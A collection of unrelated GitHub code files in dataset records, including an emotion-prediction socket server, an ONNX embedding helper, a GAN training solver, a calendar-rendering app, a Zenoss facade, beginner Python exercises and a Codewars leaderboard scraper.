PORT))\r\ns.listen(5)\r\nclt, adr = s.accept()\r\n\r\nwith clt:\r\n print(f\"Connection to {adr} established\")\r\n finish = False\r\n while True: # Go until Client closes connection\r\n full_msg = b''\r\n new_msg = True\r\n while True: # Go Until full message is received\r\n msg = clt.recv(1024)\r\n if len(msg) == 0:\r\n finish = True\r\n break\r\n if new_msg:\r\n # print(f\"new message length: {msg[:HEADER_SIZE]}\")\r\n msglen = int(msg[:HEADER_SIZE])\r\n new_msg = False\r\n full_msg += msg\r\n\r\n if len(full_msg) - HEADER_SIZE == msglen:\r\n # print(\"full msg rcvd\")\r\n\r\n d = full_msg[HEADER_SIZE:]\r\n pic_path = 'GazeboPics\\\\emotion' + str(c2) + '.png'\r\n\r\n with open(pic_path, 'wb') as f:\r\n f.write(d)\r\n f.close()\r\n\r\n print(\"Send data to predict\")\r\n emotion = predict.isFace(face_cascade, model, pic_path)\r\n\r\n print(\"Image was: \", emotion)\r\n\r\n clt.send(bytes(str(emotion), \"utf-8\"))\r\n\r\n new_msg = True\r\n full_msg = b''\r\n c2 += 1\r\n if finish:\r\n break\r\n\r\n clt.send(bytes(\"THANK YOU FOR CONNECTING !\", \"utf-8\"))\r\n\r\nprint(c2)\r\nclt.close()\r\ns.close()\r\n","repo_name":"eddyhom/Master-Thesis","sub_path":"Python/CNN/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30142608290","text":"############################################################################################\n## The following packages must be installed
\n'''\npip install datasets\npip install optimum\npip install optimum[onnxruntime]\npip install optimum[onnxruntime-gpu] #if using a GPU\npip install transformers[onnx]\n''' \n############################################################################################\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom transformers import AutoTokenizer\nfrom optimum.onnxruntime import ORTModelForFeatureExtraction\n\n#----------------------------------------------------------------------------\n# Load the onnx model\n# -in : path to the folder where model.onnx and vocab.txt are stored.\n# -out: tokenizer and onnx model instances \n#----------------------------------------------------------------------------\ndef onnx_model(model_path:str):\n assert model_path is not None, f'model_path is None!'\n \n tokenizer = AutoTokenizer.from_pretrained(model_path)\n model = ORTModelForFeatureExtraction.from_pretrained(model_path)\n return tokenizer, model\n \n#------------------------------------------------------------------------------------------------------------------------------\n# Creates embedding vectors for the input text (list) and returns them as an array\n# - in : model=model instance, contexts=1-D text list, e.g.: ['오늘 날씨가 너무 좋다']\n# - in : return_tensor=True generates the embedding vectors as tensors.\n# - in : token_embeddings=how to shape the output; False=>'sentence embeddings'->one 768-dim sentence embedding, True=>token_embeddings=>per-token embeddings\n# - in : normalize : True=normalize the embeddings so the output vectors have length 1.\n# - out : when token_embeddings=True=>outputs per-token embeddings=> list[tensor(250,768), tensor(243,768), tensor(111,768),..] returned as a list of tensors.\n# when token_embeddings=False=>outputs one embedding per text=> array[768, 768, 768,...] returned as a float32 array.\n#------------------------------------------------------------------------------------------------------------------------------\ndef onnx_embed_text(model, tokenizer, paragraphs:list, max_length:int=128, token_embeddings=True, debug=False):\n \n inputs = tokenizer(paragraphs, max_length=max_length, truncation=True, padding=\"max_length\", return_tensors=\"pt\")\n \n outputs = model(**inputs)\n output = outputs.last_hidden_state\n\n if token_embeddings == True: # output per-token embeddings for the contexts. \n # the attention_mask of one sentence looks like [1,1,1,1,0,0,0,... ]; build a list holding only the count of the 1s\n # => the onnx model outputs also include the input padding (0) positions, so a 128-element array comes back; keep the count of real tokens.\n attention_mask_list = [list(row).count(1) for row in inputs.attention_mask]\n \n # for the sentences of one paragraph, build the vectors as a [tensor(250,768), tensor(243,768), tensor(111,768),..] 
\n\n# main\nif __name__ == '__main__':\n    main()","repo_name":"kobongsoo/GPUTech","sub_path":"myutils/onnx.py","file_name":"onnx.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"29201156707","text":"import torch\nimport os\nimport time\nimport datetime\n\nfrom munch import Munch\nfrom utils.checkpoint import CheckpointIO\nfrom utils.misc import get_datetime, send_message\nfrom utils.model import print_network\nfrom utils.file import delete_dir, write_record, delete_model\nfrom models.build import build_model\nfrom solver.utils import he_init, moving_average\nfrom solver.misc import translate_using_label, generate_samples\nfrom solver.loss import compute_g_loss, compute_d_loss\nfrom data.fetcher import Fetcher\nfrom metrics.eval import calculate_metrics, calculate_total_fid\nfrom metrics.fid import calculate_fid_given_paths\n\n\nclass Solver:\n    def __init__(self, args):\n        super().__init__()\n        self.args = args\n        self.device = torch.device(args.device)\n        self.nets, self.nets_ema = build_model(args)\n        for name, module in self.nets.items():\n            print_network(module, name)\n        # self.to(self.device)\n        for net in self.nets.values():\n            net.to(self.device)\n        for net in self.nets_ema.values():\n            net.to(self.device)\n\n        if args.mode == 'train':\n            # Setup optimizers for all nets to learn.\n            self.optims = Munch()\n            for net in self.nets.keys():\n                self.optims[net] = torch.optim.Adam(\n                    params=self.nets[net].parameters(),\n                    lr=args.d_lr if net == 'discriminator' else args.lr,\n                    betas=(args.beta1, args.beta2),\n                    weight_decay=args.weight_decay)\n            self.ckptios = [\n                CheckpointIO(args.model_dir + '/{:06d}_nets.ckpt', **self.nets),\n                CheckpointIO(args.model_dir + '/{:06d}_nets_ema.ckpt', **self.nets_ema),\n                CheckpointIO(args.model_dir + '/{:06d}_optims.ckpt', **self.optims)]\n        else:\n            self.ckptios = [CheckpointIO(args.model_dir + '/{:06d}_nets_ema.ckpt', **self.nets_ema)]\n\n        self.use_tensorboard = args.use_tensorboard\n        if self.use_tensorboard:\n            from utils.logger import Logger\n            self.logger = Logger(args.log_dir)\n\n    def initialize_parameters(self):\n        if self.args.parameter_init == 'he':\n            for name, network in self.nets.items():\n                if 'ema' not in name and 'fan' not in name and 'resnet18' not in name:\n                    print('Initializing %s...' 
% name, end=' ')\n network.apply(he_init)\n print('Done.')\n elif self.args.parameter_init == 'default':\n # Do nothing because the parameters has been initialized in this manner.\n pass\n\n def save_model(self, step):\n for ckptio in self.ckptios:\n ckptio.save(step)\n\n def load_model(self, step):\n for ckptio in self.ckptios:\n ckptio.load(step)\n\n def load_model_from_path(self, path):\n for ckptio in self.ckptios:\n ckptio.load_from_path(path)\n\n def zero_grad(self):\n for optimizer in self.optims.values():\n optimizer.zero_grad()\n\n def train(self, loaders):\n args = self.args\n nets = self.nets\n nets_ema = self.nets_ema\n optims = self.optims\n\n train_fetcher = Fetcher(loaders.train, args)\n test_fetcher = Fetcher(loaders.test, args)\n\n # Those fixed samples are used to show the trend.\n fixed_train_sample = next(train_fetcher)\n fixed_test_sample = next(test_fetcher)\n if args.selected_path:\n # actually we don't care y\n fixed_selected_samples = next(iter(loaders.selected))\n fixed_selected_samples = fixed_selected_samples.to(self.device)\n\n # Load or initialize the model parameters.\n if args.start_iter > 0:\n self.load_model(args.start_iter)\n else:\n self.initialize_parameters()\n\n best_fid = 10000\n best_step = 0\n print('Start training...')\n start_time = time.time()\n for step in range(args.start_iter + 1, args.end_iter + 1):\n sample_org = next(train_fetcher) # sample that to be translated\n sample_ref = next(train_fetcher) # reference samples\n\n masks = nets.fan.get_heatmap(sample_org.x) if args.w_hpf > 0 else None\n\n # Train the discriminator\n d_loss, d_loss_ref = compute_d_loss(nets, args, sample_org, sample_ref, masks=masks)\n self.zero_grad()\n d_loss.backward()\n optims.discriminator.step()\n\n # Train the generator, style_encoder and style_transformer\n g_loss, g_loss_ref = compute_g_loss(nets, args, sample_org, sample_ref, masks=masks)\n self.zero_grad()\n g_loss.backward()\n optims.generator.step()\n optims.style_encoder.step()\n optims.style_transformer.step()\n\n # Update corresponding ema version models\n moving_average(nets.generator, nets_ema.generator, beta=args.ema_beta)\n moving_average(nets.style_encoder, nets_ema.style_encoder, beta=args.ema_beta)\n moving_average(nets.style_transformer, nets_ema.style_transformer, beta=args.ema_beta)\n\n if step % args.log_every == 0:\n elapsed = time.time() - start_time\n elapsed = str(datetime.timedelta(seconds=elapsed))[:-7]\n log = \"[%s]-[%i/%i]: \" % (elapsed, step, args.end_iter)\n all_losses = dict()\n for loss, prefix in zip([d_loss_ref, g_loss_ref], ['D/', 'G/']):\n for key, value in loss.items():\n all_losses[prefix + key] = value\n log += ' '.join(['%s: [%.4f]' % (key, value) for key, value in all_losses.items()])\n print(log)\n if args.save_loss:\n if step == args.log_every:\n header = ','.join(['iter'] + [str(loss) for loss in all_losses.keys()])\n write_record(header, args.loss_file, False)\n log = ','.join([str(step)] + [str(loss) for loss in all_losses.values()])\n write_record(log, args.loss_file, False)\n if self.use_tensorboard:\n for tag, value in all_losses.items():\n self.logger.scalar_summary(tag, value, step)\n\n if step % args.sample_every == 0:\n N = args.batch_size\n y_trg_list = [torch.tensor(y).repeat(N).to(self.device) for y in range(min(args.num_domains, 5))]\n translate_using_label(nets, args, fixed_test_sample, y_trg_list,\n os.path.join(args.sample_dir, f\"test_{step}.jpg\"))\n translate_using_label(nets, args, fixed_train_sample, y_trg_list,\n os.path.join(args.sample_dir, 
f\"train_{step}.jpg\"))\n if args.selected_path:\n N = fixed_selected_samples.shape[0]\n y_trg_list = [torch.tensor(y).repeat(N).to(self.device) for y in range(min(args.num_domains, 5))]\n translate_using_label(nets, args, fixed_selected_samples, y_trg_list,\n os.path.join(args.sample_dir, f\"selected_{step}.jpg\"))\n\n if step % args.save_every == 0:\n self.save_model(step)\n last_step = step - args.save_every\n if last_step != best_step and not args.keep_all_models:\n delete_model(args.model_dir, last_step)\n\n if step % args.eval_every == 0:\n fid = calculate_total_fid(nets_ema, args, f\"step_{step}\")\n if fid < best_fid:\n if not args.keep_all_models:\n delete_model(args.model_dir, best_step)\n best_fid = fid\n best_step = step\n info = f\"step: {step} current fid: {fid:.2f} history best fid: {best_fid:.2f}\"\n send_message(info, args.exp_id)\n write_record(info, args.record_file)\n send_message(\"Model training completed.\")\n\n @torch.no_grad()\n def sample(self):\n args = self.args\n assert args.eval_iter != 0\n self.load_model(args.eval_iter)\n nets_ema = self.nets_ema\n if not args.sample_id:\n args.sample_id = get_datetime()\n sample_path = os.path.join(args.sample_dir, args.sample_id)\n generate_samples(nets_ema, args, sample_path)\n return sample_path\n\n @torch.no_grad()\n def evaluate(self):\n args = self.args\n assert args.eval_path != \"\", \"eval_path shouldn't be empty\"\n target_path = args.eval_path\n sample_path = self.sample()\n fid = calculate_fid_given_paths(paths=[target_path, sample_path], img_size=args.img_size,\n batch_size=args.eval_batch_size)\n print(f\"FID is: {fid}\")\n send_message(f\"Sample {args.sample_id}'s FID is {fid}\")\n if not args.keep_eval_files:\n delete_dir(sample_path)\n","repo_name":"songquanpeng/L2M-GAN","sub_path":"solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":9074,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"70758279236","text":"class Solution:\n def rob(self, nums: List[int]) -> int:\n\n if len(nums) == 1: return nums[0]\n if len(nums) <= 3: return max(nums)\n max1 = 0\n max2 = nums[0]\n for i in range(1, len(nums) - 1):\n tsum = max(max1 + nums[i], max2)\n max1 = max2\n max2 = tsum\n tt1 = tsum\n max1 = 0\n max2 = nums[1]\n for i in range(2, len(nums)):\n tsum = max(max1 + nums[i], max2)\n max1 = max2\n max2 = tsum\n tt2 = tsum\n return max(tt1, tt2)","repo_name":"aso2001/LeetCode","sub_path":"0213-house-robber-ii/0213-house-robber-ii.py","file_name":"0213-house-robber-ii.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6035928439","text":"from Obstacle import *\nfrom Robot import *\n\nclass Map():\n \n def __init__(self, obstacles, robot, min_angle=0, max_angle=90):\n self.obstacles = obstacles\n self.robot = robot.copy()\n self.min_angle = min_angle\n self.max_angle = max_angle\n self.getAllCSpaces()\n\n def getAllCSpaces(self):\n self.CSpaces = []\n for angle in xrange(self.min_angle, self.max_angle+1):\n self.CSpaces.append(self.getCSpace(angle))\n \n\n def getCSpace(self, angle=0):\n CSpace = []\n robot = self.robot.copy()\n robot.rotate(angle)\n for o in self.obstacles:\n c = o.copy()\n c.getCSpace(robot)\n CSpace.append(c)\n return CSpace\n\n def pointInCSpace(self,i, point):\n for o in self.CSpaces[i]:\n for p in o.CSpace:\n if p.pointInPoly(point):\n return False\n return True\n \n def vertices(self,i):\n vertices = []\n for o 
in self.CSpaces[i]:\n vertices.extend(o.mapVertices())\n return vertices\n\n def isSegLegal(self, segment, i):\n for o in self.CSpaces[i]:\n for p in o.CSpace:\n if p.intersectSeg(segment) or p.pointInPoly(segment.midpoint()):\n return False\n return True\n \n","repo_name":"jperezdiaz/6.0S78","sub_path":"pset2/Map.py","file_name":"Map.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18926532174","text":"from PIL import Image, ImageDraw, ImageFont\nfrom datetime import datetime\nfrom apps import App, ExecutionContext, DEFAULT_FONT\nimport calendar\nfrom frame.image_utils import draw_text_with_border\n\n\nclass CalendarApp(App):\n def run(self, context: ExecutionContext):\n width, height = context.image.size\n\n # Get the current month details\n now = datetime.now()\n month_name = now.strftime('%B')\n year = now.strftime('%Y')\n _, last_day = calendar.monthrange(now.year, now.month)\n \n start_day_config = self.get_config('start_day', 'Sunday')\n start_day = 0 if start_day_config == \"Sunday\" else 1\n \n # Config settings\n font_color = self.get_config('font_color', 'black')\n font_size = int(self.get_config('font_size', 40))\n border_color = self.get_config('border_color', 'white')\n border_width = int(self.get_config('border_width', 2))\n calendar_width_percentage = float(self.get_config('calendar_width_percentage', '80')) / 100\n calendar_height_percentage = float(self.get_config('calendar_height_percentage', '80')) / 100\n position = self.get_config('position', 'center-center')\n font = ImageFont.truetype(DEFAULT_FONT, font_size)\n\n title_font_color = self.get_config('title_font_color', 'black')\n title_font_size = int(self.get_config('title_font_size', 50))\n title_border_color = self.get_config('title_border_color', 'white')\n title_border_width = int(self.get_config('title_border_width', 2))\n title_font = ImageFont.truetype(DEFAULT_FONT, title_font_size)\n\n today_font_color = self.get_config('today_font_color', 'red')\n today_font_size = int(self.get_config('today_font_size', 60))\n today_border_color = self.get_config('today_border_color', 'black')\n today_border_width = int(self.get_config('today_border_width', 2))\n today_font = ImageFont.truetype(DEFAULT_FONT, today_font_size)\n\n draw = ImageDraw.Draw(context.image)\n \n # Determine the first weekday of the month (0 = Monday, 6 = Sunday)\n first_weekday_of_month = calendar.monthrange(now.year, now.month)[0]\n\n if start_day == 0: # Sunday as the start of the week\n current_day = 1 - first_weekday_of_month + 6 # +6 because Sunday is represented as 6 in the weekday\n else: # Monday as the start of the week\n current_day = 1 - first_weekday_of_month\n\n # The logic to determine the number of rows required for the month\n days_in_month = last_day\n total_cells = first_weekday_of_month + days_in_month # number of days plus the starting position\n max_rows = 1 + (total_cells + 6) // 7 # ceil division\n\n # Calculate cell size and start position\n padding = 4\n cell_width = (width - 2 * padding) * calendar_width_percentage / 7\n cell_height = (height - 2 * padding) * calendar_height_percentage / max_rows\n\n if position == 'top-left':\n start_x, start_y = padding, padding\n elif position == 'top-center':\n start_x = (width - cell_width * 7) / 2\n start_y = padding\n elif position == 'top-right':\n start_x = width - cell_width * 7 - padding\n start_y = padding\n elif position == 'center-left':\n start_x = padding\n start_y = 
(height - cell_height * max_rows) / 2\n        elif position == 'center-center':\n            start_x = (width - cell_width * 7) / 2\n            start_y = (height - cell_height * max_rows) / 2\n        elif position == 'center-right':\n            start_x = width - cell_width * 7 - padding\n            start_y = (height - cell_height * max_rows) / 2\n        elif position == 'bottom-left':\n            start_x = padding\n            start_y = height - cell_height * max_rows - padding\n        elif position == 'bottom-center':\n            start_x = (width - cell_width * 7) / 2\n            start_y = height - cell_height * max_rows - padding\n        elif position == 'bottom-right':\n            start_x = width - cell_width * 7 - padding\n            start_y = height - cell_height * max_rows - padding\n\n        # Vertical lines\n        for i in range(8): # There are 8 lines for 7 columns\n            line_start_x = start_x + i * cell_width\n            line_start_y = start_y + cell_height # Start below the month title\n            line_end_x = line_start_x\n            line_end_y = line_start_y + (max_rows - 1) * cell_height\n            draw.line([(line_start_x, line_start_y), (line_end_x, line_end_y)], fill=border_color)\n\n        # Horizontal lines\n        for i in range(max_rows + 1): # There are max_rows+1 lines\n            line_start_x = start_x\n            line_start_y = start_y + i * cell_height + cell_height # Start below the month title\n            line_end_x = start_x + 7 * cell_width\n            line_end_y = line_start_y\n            draw.line([(line_start_x, line_start_y), (line_end_x, line_end_y)], fill=border_color)\n\n        # Draw month name at the top\n        title_text = self.get_config('title_template', \"Let's pretend it's \\\"{month}\\\"\")\n        title_text = title_text.replace('{month}', month_name)\n        title_text = title_text.replace('{year}', year)\n        title_alignment = self.get_config('title_alignment', 'left')\n\n        title_width, title_height = title_font.getsize(title_text)\n        title_height *= 1.15\n        if title_alignment == 'center':\n            title_x = start_x + (7 * cell_width - title_width) / 2\n        elif title_alignment == 'right':\n            title_x = start_x + 7 * cell_width - title_width\n        else: # left by default\n            title_x = start_x\n\n        title_y = start_y + (cell_height - title_height) / 2\n\n        draw_text_with_border(draw, (title_x, title_y), title_text, title_font, title_font_color, title_border_color, title_border_width)\n\n        # Draw the calendar grid. Reset to the first grid cell, keeping the weekday the\n        # month starts on (the original reset ignored first_weekday_of_month, so day 1\n        # could land in the wrong column).\n        if start_day == 0:  # Sunday-start weeks\n            current_day = 1 - ((first_weekday_of_month + 1) % 7)\n        else:  # Monday-start weeks\n            current_day = 1 - first_weekday_of_month\n        for row in range(max_rows):\n            for col in range(7):\n                if 1 <= current_day <= last_day:\n                    day_text = str(current_day)\n                    if current_day == now.day:\n                        text_width, text_height = draw.textsize(day_text, font=today_font)\n                    else:\n                        text_width, text_height = draw.textsize(day_text, font=font)\n                    text_height *= 1.15\n                    \n                    x = start_x + col * cell_width + (cell_width - text_width) / 2\n                    y = start_y + (row + 1) * cell_height + (cell_height - text_height) / 2\n                    if current_day == now.day:\n                        draw_text_with_border(draw, (x, y), day_text, today_font, today_font_color, today_border_color, today_border_width)\n                    else:\n                        draw_text_with_border(draw, (x, y), day_text, font, font_color, border_color, border_width)\n                current_day += 1\n        \n        self.log(f\"Added calendar for month: {month_name}\")","repo_name":"FrameOS/frameos","sub_path":"frameos/apps/calendar/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
{"seq_id":"17623867523","text":"import logging\nfrom zope.component import getUtility\nfrom zope.interface import implementer\n\nfrom Products.ZenUtils.application import IApplicationManager\nfrom Products.Zuul.interfaces import IApplicationFacade\n\nLOG = 
logging.getLogger(\"Zuul.facades\")\n\n\n@implementer(IApplicationFacade)\nclass ApplicationFacade(object):\n \"\"\"\n \"\"\"\n \n def __init__(self, dataroot):\n \"\"\"\n \"\"\"\n self._dmd = dataroot\n self._svc = getUtility(IApplicationManager)\n\n def getResourcePoolIds(self):\n return ['default']\n \n def query(self, name=None):\n \"\"\"\n Returns a sequence of application objects.\n \"\"\"\n result = self._svc.query(name=name, tags=[\"daemon\"])\n if not result:\n return ()\n return tuple(result)\n\n def queryMasterDaemons(self):\n \"\"\"\n Return an iterable producing application objects not associated\n with any monitor.\n \"\"\"\n result = self._svc.query(tags=[\"daemon\", \"-collector\"])\n if not result:\n return ()\n return tuple(result)\n\n def queryMonitorDaemons(self, monitorId):\n \"\"\"\n Return an iterable producing application objects that are\n associated with specified monitor.\n \"\"\"\n # Get daemons associated with monitor.\n result = self._svc.query(\n monitorName=monitorId, tags=[\"daemon\", \"collector\"]\n )\n if not result:\n return ()\n return tuple(result)\n\n def get(self, applicationId, default=None):\n \"\"\"\n Returns the requested application object.\n \"\"\"\n app = self._svc.get(applicationId, default)\n if not app:\n return default\n return app\n\n def getLog(self, appId, lastCount=None):\n \"\"\"\n Retrieve the log of the identified application. Optionally,\n a count of the last N lines to retrieve may be given.\n \"\"\"\n app = self._svc.get(appId)\n if not app:\n raise RuntimeError(\"No such application '%s'\" % (appId,))\n if app.log:\n count = lastCount if lastCount else 200\n return '\\n'.join(app.log.last(count))\n else:\n return '' # not running, so no log.\n\n def start(self, appId):\n \"\"\"\n Starts the application.\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.start()\n\n def stop(self, appId):\n \"\"\"\n Stops the application.\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.stop()\n\n def restart(self, appId):\n \"\"\"\n Restarts the application.\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.restart()\n\n def updateService(self, appId):\n \"\"\"\n \"\"\"\n app = self._svc.get(appId)\n if app:\n app.update()\n\n\n__all__ = (\"ApplicationFacade\",)\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/Zuul/facades/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"27463570106","text":"DATA = [\n {\n 'name': 'Facundo',\n 'age': 72,\n 'organization': 'Platzi',\n 'position': 'Technical Coach',\n 'language': 'python',\n },\n {\n 'name': 'Luisana',\n 'age': 33,\n 'organization': 'Globant',\n 'position': 'UX Designer',\n 'language': 'javascript',\n },\n {\n 'name': 'Héctor',\n 'age': 19,\n 'organization': 'Platzi',\n 'position': 'Associate',\n 'language': 'ruby',\n },\n {\n 'name': 'Gabriel',\n 'age': 20,\n 'organization': 'Platzi',\n 'position': 'Associate',\n 'language': 'javascript',\n },\n {\n 'name': 'Isabella',\n 'age': 30,\n 'organization': 'Platzi',\n 'position': 'QA Manager',\n 'language': 'java',\n },\n {\n 'name': 'Karo',\n 'age': 23,\n 'organization': 'Everis',\n 'position': 'Backend Developer',\n 'language': 'python',\n },\n {\n 'name': 'Ariel',\n 'age': 32,\n 'organization': 'Rappi',\n 'position': 'Support',\n 'language': '',\n },\n {\n 'name': 'Juan',\n 'age': 17,\n 'organization': '',\n 'position': 'Student',\n 'language': 'go',\n },\n {\n 'name': 'Pablo',\n 
'age': 32,\n        'organization': 'Master',\n        'position': 'Human Resources Manager',\n        'language': 'python',\n    },\n    {\n        'name': 'Lorena',\n        'age': 56,\n        'organization': 'Python Organization',\n        'position': 'Language Maker',\n        'language': 'python',\n    },\n]\n\n# A.\n# Using filter and map (higher-order functions), build the lists\n# name_python_programmer (names of the python programmers) and\n# platzi_workers (Platzi workers) -- exercises A and B.\n\n# B.\n# Using list comprehensions, build the lists\n# adult_worker and old_worker -- exercises C and D.\n\ndef run():\n    # A. Names of the python programmers\n    name_python_programmer = list(filter(lambda worker: worker['language'] == 'python', DATA))\n    name_python_programmer = list(map(lambda worker: worker['name'], name_python_programmer))\n\n    # Platzi workers\n    platzi_workers = list(filter(lambda worker: worker['organization'] == 'Platzi', DATA))\n    platzi_workers = list(map(lambda worker: worker['name'], platzi_workers))\n\n    # B. adult_worker (workers aged 18 or older)\n    adult_worker = [worker['name'] for worker in DATA if worker['age'] >= 18]\n    \n    # Build a new list of dicts, old_worker, adding an 'old' flag that is True or False\n    old_worker = [worker | {'old': worker['age'] > 70} for worker in DATA]\n\n    for worker in old_worker:\n        print(worker)\n\n\nif __name__ == '__main__':\n    run()","repo_name":"JulianBernalM/curso_python","sub_path":"filtering_data_practice.py","file_name":"filtering_data_practice.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"10898227175","text":"import json\n\nfrom recipes.models import Ingredient\nfrom django.core.management.base import BaseCommand\n\n\nclass Command(BaseCommand):\n    \"\"\"\n    python manage.py CSVexport\n    \"\"\"\n\n    def handle(self, *args, **kwargs):\n        Ingredient.objects.all().delete()\n        file_path = 'data/ingredients.json'\n        with open(file_path, encoding='utf-8') as file:\n            data = json.load(file)\n\n        for item in data:\n            Ingredient.objects.create(\n                name=item['name'],\n                measurement_unit=item['measurement_unit']\n            )\n","repo_name":"ilyasurkov94/foodgram-project-react","sub_path":"backend/recipes/management/commands/CSVexport.py","file_name":"CSVexport.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"74753594115","text":"#!/usr/bin/env python3 \n# -*- coding: utf-8 -*- \n#----------------------------------------------------------------------------\n# Created by : davoc\n# For : Class 6, Loops - the FOR loop. Mision TIC 2022. 9 May 2022\n# # version ='1.0' VsCodium\n\n\n# A for loop always needs a control variable; it takes successive values,\n# increasing or decreasing according to the range.\n# In these ranges the first number is included, the second one is not.\n\nfor i in range(1,10):\n    print(i)\n\nfor i in reversed(range(1,10)): # Prints the numbers 9 down to 1 (10 is excluded); the range bounds are still respected\n    print(i)\n
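\n# (Added note, in the spirit of this lesson) range() itself can count down when given\n# a negative step -- an equivalent way to write the countdown above:\nfor i in range(9, 0, -1):\n    print(i)\n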
\n# Now let's do the same with a while loop\ni = 10\nwhile i >= 1:\n    print(i)\n    i = i - 1\n\n# Multiplication table of 8\n\nx = 1\nwhile x <= 10:\n    print(x*8)\n    x = x + 1\n\n# And the same with a for loop\nfor i in range(1,11):\n    print(i*8)\n","repo_name":"labsigco/Mision51_2022","sub_path":"Ciclo1/Unidad1/Scripts/U1_C6_3_CicloFor.py","file_name":"U1_C6_3_CicloFor.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"42831365125","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 21 10:41:22 2021\r\n\r\n@author: calle\r\n\"\"\"\r\n\r\n#this package only supports xls files\r\nimport xlrd\r\n\r\nimport fixedChargeTransportationModel\r\nimport time\r\n\r\nstart_time_read_data = time.time()\r\n\r\n# raw string: the Windows path contains backslashes\r\npath=r\"C:\\OneDrive - Deakin University\\OD\\Personal\\Software Documentation\\Gurobi\\data fixed charge transportation problem.xlsx\"\r\nbook = xlrd.open_workbook(path)\r\n\r\nsOrigins=[]\r\nsDestinations=[]\r\npSupply={}\r\npDemand={}\r\npCost={}\r\npCostOpen={}\r\n\r\nsh = book.sheet_by_name(\"shOrigins\")\r\n#a = sh.cell_value(0,0)\r\n#print(a)\r\nrow=1\r\nwhile True:\r\n    try:\r\n        i = sh.cell_value(row,0)\r\n        sOrigins.append(i)\r\n        pSupply[i]=sh.cell_value(row,1)\r\n        row=row+1\r\n    except IndexError:\r\n        break\r\nsh = book.sheet_by_name(\"shDestinations\")\r\nrow=1\r\nwhile True:\r\n    try:\r\n        j = sh.cell_value(row, 0)\r\n        sDestinations.append(j)\r\n        pDemand[j]=sh.cell_value(row,1)\r\n        row=row+1\r\n    except IndexError:\r\n        break\r\n\r\nsh = book.sheet_by_name(\"shOriginsDestinations\")\r\nrow=1\r\nwhile True:\r\n    try:\r\n        i = sh.cell_value(row, 0)\r\n        j = sh.cell_value(row, 1)\r\n        \r\n        pCost[i,j]=sh.cell_value(row,2)\r\n        row=row+1\r\n    except IndexError:\r\n        break\r\n\r\nend_time_read_data = time.time()\r\n\r\nprint('read from xlrd takes ' + str(end_time_read_data-start_time_read_data))\r\nprint(\"--- %s seconds ---\" % (end_time_read_data-start_time_read_data))\r\n\r\noutputVTransport = fixedChargeTransportationModel.transModel(sOrigins, sDestinations, pSupply, pDemand, pCost, pCostOpen)[0]\r\n\r\n\r\n","repo_name":"juanescasa/LearningGurobi","sub_path":"reading data from excel Fixed Charge Transportation Problem.py","file_name":"reading data from excel Fixed Charge Transportation Problem.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"384943342","text":"\"\"\"Kata url: https://www.codewars.com/kata/5a57d101cadebf03d40000b9.\"\"\"\n\nfrom __future__ import annotations\n\nfrom dataclasses import dataclass\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://www.codewars.com/users/leaderboard\"\n\n\nclass OneIndexedList(list):\n    def __getitem__(self, index):\n        return super().__getitem__(index - 1)\n
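\n# (Editor's note, added) Only plain integer indexing is shifted here: lst[1] is the\n# first element. Two edge cases this kata never exercises: lst[0] becomes\n# super().__getitem__(-1), i.e. the LAST element, and a slice such as lst[1:3]\n# raises TypeError because slice - 1 is not defined.\n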
\n\n@dataclass\nclass Leaderboard:\n    position: OneIndexedList\n\n\n@dataclass\nclass User:\n    name: str\n    clan: str\n    honor: int\n\n\ndef solution() -> Leaderboard:\n    soup = BeautifulSoup(requests.get(URL).text, \"html.parser\")\n    return Leaderboard(\n        OneIndexedList(\n            User(\n                x.parent[\"data-username\"],\n                x.previous_element.text,\n                int(x.text.replace(\",\", \"\")),\n            )\n            for x in soup.find_all(\"td\", class_=\"honor\")\n        )\n    )\n\n\ndef test_solution():\n    leaderboard = solution()\n\n    assert len(leaderboard.position) == 500\n\n    assert leaderboard.position[1].name\n    assert all(isinstance(u.honor, int) for u in leaderboard.position)\n","repo_name":"Sigmanificient/codewars","sub_path":"src/python/katas/py6kyu/codewars_leaderboard.py","file_name":"codewars_leaderboard.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
